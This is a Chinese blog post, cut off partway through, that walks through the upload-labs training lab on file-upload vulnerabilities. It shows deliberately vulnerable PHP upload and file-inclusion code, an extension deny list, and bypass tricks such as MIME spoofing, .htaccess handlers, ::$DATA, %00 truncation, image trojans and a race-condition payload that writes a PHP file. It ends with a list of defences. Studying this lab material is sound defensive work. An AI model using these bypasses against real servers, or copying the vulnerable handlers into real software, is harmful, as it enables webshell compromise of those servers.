



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Hexo" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Hexo" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="Hexo" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="File upload" />


<link rel="canonical" href="http://example.com/2022/04/16/Upload/">



  <title>
File upload - web安全 |
Yume Shoka = Hexo</title>
<meta name="generator" content="Hexo 5.4.2"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">File upload
  </h1>
  
<div class="meta">
  <span class="item" title="Created: 2022-04-16 13:38:45">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">Posted on</span>
    <time itemprop="dateCreated datePublished" datetime="2022-04-16T13:38:45+08:00">2022-04-16</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="Toggle navigation bar">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Yume Shoka</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipeun65urj20zk0m81ii.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipesng5oej20zk0m87d4.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclx6phq6j20zk0m8e36.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclfw2t96j20zk0m8x6p.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipeudstjqj20zk0m8k3r.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipew8gmvyj20zk0m87wh.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">Home</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/web%E5%AE%89%E5%85%A8/" itemprop="item" rel="index" title="In web安全"><span itemprop="name">web安全</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="en">
  <link itemprop="mainEntityOfPage" href="http://example.com/2022/04/16/Upload/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="John Doe">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Hexo">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="upload"><a class="markdownIt-Anchor" href="#upload">#</a> Upload</h1>
<blockquote>
<p>当用户点击上传按钮后，后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等，然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨，则攻击着可能会上传一些恶意的文件，比如一句话木马，从而导致后台服务器被 webshell。</p>
<p>所以，在设计文件上传功能时，一定要对传进来的文件进行严格的安全考虑。比如：<br>
–验证文件类型、后缀名、大小；<br>
–验证文件的上传方式；<br>
–对文件进行一定复杂的重命名；<br>
–不要暴露文件上传后的路径；<br>
–等等…</p>
</blockquote>
<h2 id="upload-labs"><a class="markdownIt-Anchor" href="#upload-labs">#</a> upload-labs</h2>
<p>Pass01</p>
<p>文件上传时先上传到临时目录，在从临时目录移动到定义的文件夹</p>
<p>C:\Users\18310\AppData\local\temp  -&gt;  ./uploads/xxx.php</p>
<p>上传结束，临时文件删除</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$is_upload = false;</span><br><span class="line">$msg = null;</span><br><span class="line">if (isset($_POST[&#x27;submit&#x27;])) &#123;</span><br><span class="line">    if (file_exists(UPLOAD_PATH)) &#123; </span><br><span class="line">        $temp_file = $_FILES[&#x27;upload_file&#x27;][&#x27;tmp_name&#x27;];   //&#x27;upload_file&#x27;是数组，通过[]取值</span><br><span class="line">        $img_path = UPLOAD_PATH . &#x27;/&#x27; . $_FILES[&#x27;upload_file&#x27;][&#x27;name&#x27;];</span><br><span class="line">        if (move_uploaded_file($temp_file, $img_path))&#123;</span><br><span class="line">            $is_upload = true;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $msg = &#x27;上传出错！&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        $msg = UPLOAD_PATH . &#x27;文件夹不存在,请手工创建！&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">    function checkFile() &#123;</span><br><span class="line">        var file = document.getElementsByName(&#x27;upload_file&#x27;)[0].value;</span><br><span class="line">        if (file == null || file == &quot;&quot;) &#123;</span><br><span class="line">            alert(&quot;请选择要上传的文件!&quot;);</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">        //定义允许上传的文件类型</span><br><span class="line">        var allow_ext = &quot;.jpg|.png|.gif&quot;;</span><br><span class="line">        //提取上传文件的类型</span><br><span class="line">        var ext_name = file.substring(file.lastIndexOf(&quot;.&quot;));</span><br><span class="line">        //判断上传文件类型是否允许上传</span><br><span class="line">        if (allow_ext.indexOf(ext_name) == -1) &#123;</span><br><span class="line">            var errMsg = &quot;该文件不允许上传，请上传&quot; + allow_ext + &quot;类型的文件,当前文件类型为：&quot; + ext_name;</span><br><span class="line">            alert(errMsg);</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>method 1. 抓包，上传后缀改为 jpg 的 php，抓包后修改后缀为 php</p>
<p>method 2. 前端 JS 验证，浏览器关闭 js</p>
</blockquote>
<p>Pass02 检测 MIME</p>
<p>BP 修改 Content-Type: image/jpeg（image/png，image/gif）</p>
<p>利用 copy 和成木马图片</p>
<p>copy xxxx.jpg /b + test.php /a test1.jpg</p>
<p>Pass03</p>
<p>通过上传 php3,php5,phtml 绕过</p>
<p>上传 php3 需要在 Apache 配置文件中增加解析 php3,php5,phtml, 使 Apache 解析这些文件</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#<span class="title class_">AddType</span> text/html .<span class="property">shtml</span></span><br><span class="line"><span class="title class_">AddoutputFilter</span> <span class="variable constant_">INCLUDES</span> .<span class="property">shtml</span></span><br><span class="line"><span class="title class_">AddType</span> application/x-httpd-php .<span class="property">php</span> .<span class="property">phtml</span> .<span class="property">php3</span></span><br></pre></td></tr></table></figure>
<p>#asp 可以通过 asa 和 cer 绕过</p>
<p>Pass04</p>
<p>.htaccess 实现 php 伪静态</p>
<p>.htaccess 文件夹内文件都会被当做 php 解析</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">SetHandler</span> application/x-httpd-php   <span class="comment">//将目录下所有文件都作为php解析</span></span><br></pre></td></tr></table></figure>
<p>或使用 Apache 解析漏洞</p>
<p>test.php.x</p>
<p>预防：使用以下代码使得上传后无法解析</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2759285/1641700272045-7fc11c94-5bb3-4087-a010-94cf9230bbf7.png" alt="img"></p>
<p>Pass-04 过滤代码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = null;</span><br><span class="line"><span class="keyword">if</span> (isset(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) &#123;</span><br><span class="line">        <span class="variable">$deny_ext</span> = array(<span class="string">&quot;.php&quot;</span>,<span class="string">&quot;.php5&quot;</span>,<span class="string">&quot;.php4&quot;</span>,<span class="string">&quot;.php3&quot;</span>,<span class="string">&quot;.php2&quot;</span>,<span class="string">&quot;.php1&quot;</span>,<span class="string">&quot;.html&quot;</span>,<span class="string">&quot;.htm&quot;</span>,<span class="string">&quot;.phtml&quot;</span>,<span class="string">&quot;.pht&quot;</span>,<span class="string">&quot;.pHp&quot;</span>,<span class="string">&quot;.pHp5&quot;</span>,<span class="string">&quot;.pHp4&quot;</span>,<span class="string">&quot;.pHp3&quot;</span>,<span class="string">&quot;.pHp2&quot;</span>,<span class="string">&quot;.pHp1&quot;</span>,<span class="string">&quot;.Html&quot;</span>,<span class="string">&quot;.Htm&quot;</span>,<span class="string">&quot;.pHtml&quot;</span>,<span class="string">&quot;.jsp&quot;</span>,<span class="string">&quot;.jspa&quot;</span>,<span class="string">&quot;.jspx&quot;</span>,<span class="string">&quot;.jsw&quot;</span>,<span class="string">&quot;.jsv&quot;</span>,<span class="string">&quot;.jspf&quot;</span>,<span class="string">&quot;.jtml&quot;</span>,<span class="string">&quot;.jSp&quot;</span>,<span class="string">&quot;.jSpx&quot;</span>,<span class="string">&quot;.jSpa&quot;</span>,<span class="string">&quot;.jSw&quot;</span>,<span class="string">&quot;.jSv&quot;</span>,<span class="string">&quot;.jSpf&quot;</span>,<span class="string">&quot;.jHtml&quot;</span>,<span class="string">&quot;.asp&quot;</span>,<span class="string">&quot;.aspx&quot;</span>,<span class="string">&quot;.asa&quot;</span>,<span class="string">&quot;.asax&quot;</span>,<span class="string">&quot;.ascx&quot;</span>,<span class="string">&quot;.ashx&quot;</span>,<span class="string">&quot;.asmx&quot;</span>,<span class="string">&quot;.cer&quot;</span>,<span class="string">&quot;.aSp&quot;</span>,<span class="string">&quot;.aSpx&quot;</span>,<span class="string">&quot;.aSa&quot;</span>,<span class="string">&quot;.aSax&quot;</span>,<span class="string">&quot;.aScx&quot;</span>,<span class="string">&quot;.aShx&quot;</span>,<span class="string">&quot;.aSmx&quot;</span>,<span class="string">&quot;.cEr&quot;</span>,<span class="string">&quot;.sWf&quot;</span>,<span class="string">&quot;.swf&quot;</span>,<span class="string">&quot;.ini&quot;</span>);</span><br><span class="line">        <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">        <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);//删除文件名末尾的点</span><br><span class="line">        <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">&#x27;.&#x27;</span>);//分割取后缀</span><br><span class="line">        <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); //转换为小写</span><br><span class="line">        <span class="variable">$file_ext</span> = str_ireplace(<span class="string">&#x27;::$DATA&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$file_ext</span>);//去除字符串::<span class="variable">$DATA</span></span><br><span class="line">        <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); //收尾去空</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) &#123;</span><br><span class="line">            <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$file_name</span>;</span><br><span class="line">            <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) &#123;</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&#x27;此文件不允许上传!&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">&#x27;文件夹不存在,请手工创建！&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Pass05</p>
<p>PhP 通过大小写绕过</p>
<p>只在 Windows 下使用，因为 Windows 不区分大小写</p>
<p>Pass06</p>
<p>在提交时在文件末尾加空格绕过后缀检测，Windows 服务端会自动去除，但 php 可以识别空格</p>
<p>通过抓包修改</p>
<p>Pass07</p>
<p>后缀加.，Windows 忽略文件后的.</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2759285/1641701454141-fc96f35c-12db-4bb3-a9b5-ccbc57e77c58.png" alt="img"></p>
<p>Pass08</p>
<p>当从 Windows shell 命令行指定创建文件时，流的完整名称为 “<strong>filename</strong>:<strong>stream name</strong>:<strong>stream type</strong>”，如示例中所示： “myfile.txt:stream1:$DATA”</p>
<p>::<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>D</mi><mi>A</mi><mi>T</mi><mi>A</mi><mtext>数据流。默认数据流没有名称。对</mtext><mi>N</mi><mi>T</mi><mi>F</mi><mi>S</mi><mtext>格式下的一个文件而言，至少包含一个流，即</mtext><mi>d</mi><mi>a</mi><mi>t</mi><mi>a</mi><mtext>流（其</mtext><mi>s</mi><mi>t</mi><mi>r</mi><mi>e</mi><mi>a</mi><mi>m</mi><mi>t</mi><mi>y</mi><mi>p</mi><mi>e</mi><mtext>为</mtext></mrow><annotation encoding="application/x-tex">DATA  数据流。 默认数据流没有名称。对NTFS格式下的一个文件而言，至少包含一个流，即data流（其stream type为</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8888799999999999em;vertical-align:-0.19444em;"></span><span class="mord mathnormal" style="margin-right:0.02778em;">D</span><span class="mord mathnormal">A</span><span class="mord mathnormal" style="margin-right:0.13889em;">T</span><span class="mord mathnormal">A</span><span class="mord cjk_fallback">数</span><span class="mord cjk_fallback">据</span><span class="mord cjk_fallback">流</span><span class="mord cjk_fallback">。</span><span class="mord cjk_fallback">默</span><span class="mord cjk_fallback">认</span><span class="mord cjk_fallback">数</span><span class="mord cjk_fallback">据</span><span class="mord cjk_fallback">流</span><span class="mord cjk_fallback">没</span><span class="mord cjk_fallback">有</span><span class="mord cjk_fallback">名</span><span class="mord cjk_fallback">称</span><span class="mord cjk_fallback">。</span><span class="mord cjk_fallback">对</span><span class="mord mathnormal" style="margin-right:0.10903em;">N</span><span class="mord mathnormal" style="margin-right:0.13889em;">T</span><span class="mord mathnormal" style="margin-right:0.13889em;">F</span><span class="mord mathnormal" style="margin-right:0.05764em;">S</span><span class="mord cjk_fallback">格</span><span class="mord cjk_fallback">式</span><span class="mord cjk_fallback">下</span><span class="mord cjk_fallback">的</span><span class="mord cjk_fallback">一</span><span class="mord cjk_fallback">个</span><span class="mord cjk_fallback">文</span><span class="mord cjk_fallback">件</span><span class="mord cjk_fallback">而</span><span class="mord cjk_fallback">言</span><span class="mord cjk_fallback">，</span><span class="mord cjk_fallback">至</span><span class="mord cjk_fallback">少</span><span class="mord cjk_fallback">包</span><span class="mord cjk_fallback">含</span><span class="mord cjk_fallback">一</span><span class="mord cjk_fallback">个</span><span class="mord cjk_fallback">流</span><span class="mord cjk_fallback">，</span><span class="mord cjk_fallback">即</span><span class="mord mathnormal">d</span><span class="mord mathnormal">a</span><span class="mord mathnormal">t</span><span class="mord mathnormal">a</span><span class="mord cjk_fallback">流</span><span class="mord cjk_fallback">（</span><span class="mord cjk_fallback">其</span><span class="mord mathnormal">s</span><span class="mord mathnormal">t</span><span class="mord mathnormal" style="margin-right:0.02778em;">r</span><span class="mord mathnormal">e</span><span class="mord mathnormal">a</span><span class="mord mathnormal">m</span><span class="mord mathnormal">t</span><span class="mord mathnormal" style="margin-right:0.03588em;">y</span><span class="mord mathnormal">p</span><span class="mord mathnormal">e</span><span class="mord cjk_fallback">为</span></span></span></span> DATA），data 流是文件的主流，默认的 data 流其 stream name 为空。默认一个文件如果被指定了流，而该流没有 stream type 的话会在存储时自动添加 $DATA。</p>
<p>在 window 的时候如果文件名 + <code>&quot;::$DATA&quot;</code>  会把 <code>::$DATA</code>  之后的数据当成文件流处理，不会检测后缀名，且保持 <code>::$DATA</code>  之前的文件名</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2759285/1641701582526-a5e593cd-a5a6-4472-8185-b8c142d207ae.png" alt="img"></p>
<p>php 开发模式下 php -S localhost:9090           php 版本 &lt; 7</p>
<p>localhost:9090/web.php.  会造成任意文件下载和源码读取</p>
<p>localhost:9090/web.PHP  源码读取</p>
<p>Pass09</p>
<p><code>test.php. .   </code></p>
<p><code>test.php. .     </code>   // 最后还有一个空格</p>
<p>trim 两次，去 dot 一次，剩下一个点绕过</p>
<p>Pass10</p>
<p>后缀被替换为空</p>
<p>teat.pphphp</p>
<p>str_ireplace 可以连续过滤多次，比如 phpphp</p>
<p>test11</p>
<p>%00 截断 (get 截断) 文件可控</p>
<p>PHP 底层用 c 语言，c 语言中 \0 是结束符</p>
<p>在 PHP 中 get 方法使用 %00 进行截断，而 get 是 url 传参，url 解码后，%00 就是 \0</p>
<p>截断后原本的文件名被截断导致随机数被丢失</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$img_path = $_GET[<span class="string">&#x27;save_path&#x27;</span>].<span class="string">&quot;/&quot;</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">&quot;YmdHis&quot;</span>).<span class="string">&quot;.&quot;</span>.$file_ext;</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2759285/1641715548691-bb017a2c-3516-48af-ab83-13a2cf1828ca.png" alt="img"></p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221025161153164.png" alt="image-20221025161153164"></p>
<p>截断条件 PHP&lt;5.3.29 GPC 关闭</p>
<p>php%00 截断</p>
<p>1. 上传时路径可控，使用 00 截断</p>
<p>2. 文件下载时，00 截断绕过白名单检查</p>
<p>3. 文件包含时，00 截断后面限制 (主要是本地包含时)</p>
<p>4. 其它与文件操作有关的地方都可能使用 00 截断。</p>
<p>Pass12</p>
<p>post 截断</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$img_path = $_POST[&#x27;save_path&#x27;].&quot;/&quot;.rand(10, 99).date(&quot;YmdHis&quot;).&quot;.&quot;.$file_ext;</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2759285/1641716003160-187aa0eb-ac1d-4b9d-8250-dac1ac8499aa.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2759285/1641715928171-812d6b71-ffa2-47ac-afab-5e5577c11eb3.png" alt="img"></p>
<p>25 改为 00</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2759285/1641715981547-19efbd93-4201-4301-91e8-916dbca04d31.png" alt="img"></p>
<p>或者将 %00urldecode</p>
<p>Pass 13 文件包含</p>
<p>只读前两个字节</p>
<p>1. 上传图片码</p>
<p>copy xxxx.jpg /b + test.php /a test1.jpg</p>
<p>2. 文件包含，他写了一个 include.php 作为文件包含</p>
<?php 

include demo.jpg

?>
<p>会将包含的文件当做 PHP 执行</p>
<p>include 时文件不能可控</p>
<p>127.0.0.1/include.php?file=./upload/1.jpg</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/*</span><br><span class="line">本页面存在文件包含漏洞，用于测试图片马是否能正常运行！</span><br><span class="line">*/</span><br><span class="line">header(<span class="string">&quot;Content-Type:text/html;charset=utf-8&quot;</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(isset(<span class="variable">$file</span>))&#123;</span><br><span class="line">    include <span class="variable">$file</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    show_source(__file__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>Pass14</p>
<p>==Pass13</p>
<p>Pass16</p>
<p>重新生成文件导致木马无效</p>
<p>通过 payload 将木马插入到没有被打乱的部分，实现木马</p>
<p>png 和 jpg 都会有不被打乱的部分</p>
<p>通过脚本找到没有被打乱的部分</p>
<p><span class="exturl" data-url="aHR0cHM6Ly94ei5hbGl5dW4uY29tL3QvMjY1NyN0b2MtMg==">https://xz.aliyun.com/t/2657#toc-2</span></p>
<p>Pass17</p>
<p>时间竞争 文件先上传后判断，导致上传后出现，一旦出现资源占用时，rename 操作被中断，可以生成</p>
<p>上传一下文件，通过 intruder 连续上传，web.php</p>
<p><code>&lt;?php fputs(fopen('../haha.php','w'),'&lt;?php phpinfo(); ?&gt;');&gt;</code></p>
<p>在访问 web.php，访问时抓包，送到 intruder，一旦访问到，则会在上级目录生成 haha.php</p>
<p>解决：先判断，如果后缀不对别上传</p>
<p>写到上级目录防止递归删除文件夹中全部内容，如果不是递归删除，生成在当前目录也行</p>
<p>Pass19</p>
<p><code>.</code>  截断</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NzMwNjU0Ny9hcnRpY2xlL2RldGFpbHMvMTIwMDQzMDMy">https://blog.csdn.net/weixin_47306547/article/details/120043032</span></p>
<h2 id="文件上传防御与绕过"><a class="markdownIt-Anchor" href="#文件上传防御与绕过">#</a> 文件上传防御与绕过</h2>
<blockquote>
<p>前端验证</p>
<p>白名单过滤后缀 .gif|.jpg|.png</p>
<p>content-type 检测 image/jpeg  image/png  image/gif</p>
<p>黑名单过滤：限制 php，asp，jsp，jspx</p>
<p>exif_imagetype 文件头检测</p>
<p>二次渲染</p>
<p>先判断在上传</p>
<p>随机方式重命名</p>
<p>文件夹取消执行权限</p>
<p>在临时文件夹解压</p>
</blockquote>
<blockquote>
<p>绕过办法：</p>
<p>1. 文件大小写绕过（Php ，PhP pHp，等）</p>
<p>2. 黑白名单绕过（php，php2，php3，php5，phtml，asp，aspx，ascx，ashx，cer，asa，jsp，jspx）cdx，\x00hh\x46php</p>
<p>3. 特殊文件名绕过<br>
 1）修改数据包里的文件名为 test.php 或 test.asp_(下划线是空格) 由于这种命名格式在<br>
 windows 系统里是不允许的，所以在绕过上传之后 windows 系统会自动去掉。点和空格。Linux 和<br>
 Unix 中没有这个特性。<br>
2）::$DATA (php 在 windows 的时候如果文件名 +&quot;::DATA&quot; 会把::DATA 之后的数据当作文件流处<br>
理，不会检测后缀名，且保持 &quot;::DATA&quot; 之前的文件名，其目的就是不检查后缀名)</p>
<p>4.0x00 截断绕过（5.2 C 语言中将 \0 当作字符串的结尾）</p>
<p>5.htaccess 文件攻击（结合黑名单攻击）</p>
<p>6. 解析绕过</p>
<p>7. 修改 content-type 字段</p>
<p>8. 关闭浏览器 js</p>
<p>9. 使用图片马配合文件包含</p>
<p>10. 修改文件头</p>
<p>JPG<br>
 <code>FF D8 FF E0 00 10 4A 46 49 46</code></p>
<p>GIF<br>
 <code>47 49 46 38 39 61</code></p>
<p>(相当于文本的 GIF89a)</p>
<p>PNG<br>
 <code>89 50 4E 47</code></p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/9113969-cf4c7c27a2bea500.png" alt="img"></p>
</blockquote>
<h2 id="phpiiswindows-文件上传"><a class="markdownIt-Anchor" href="#phpiiswindows-文件上传">#</a> php+IIS+Windows 文件上传</h2>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//U-Mail demo ...</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$filename</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="variable">$filename</span> = <span class="title function_ invoke__">preg_replace</span>(<span 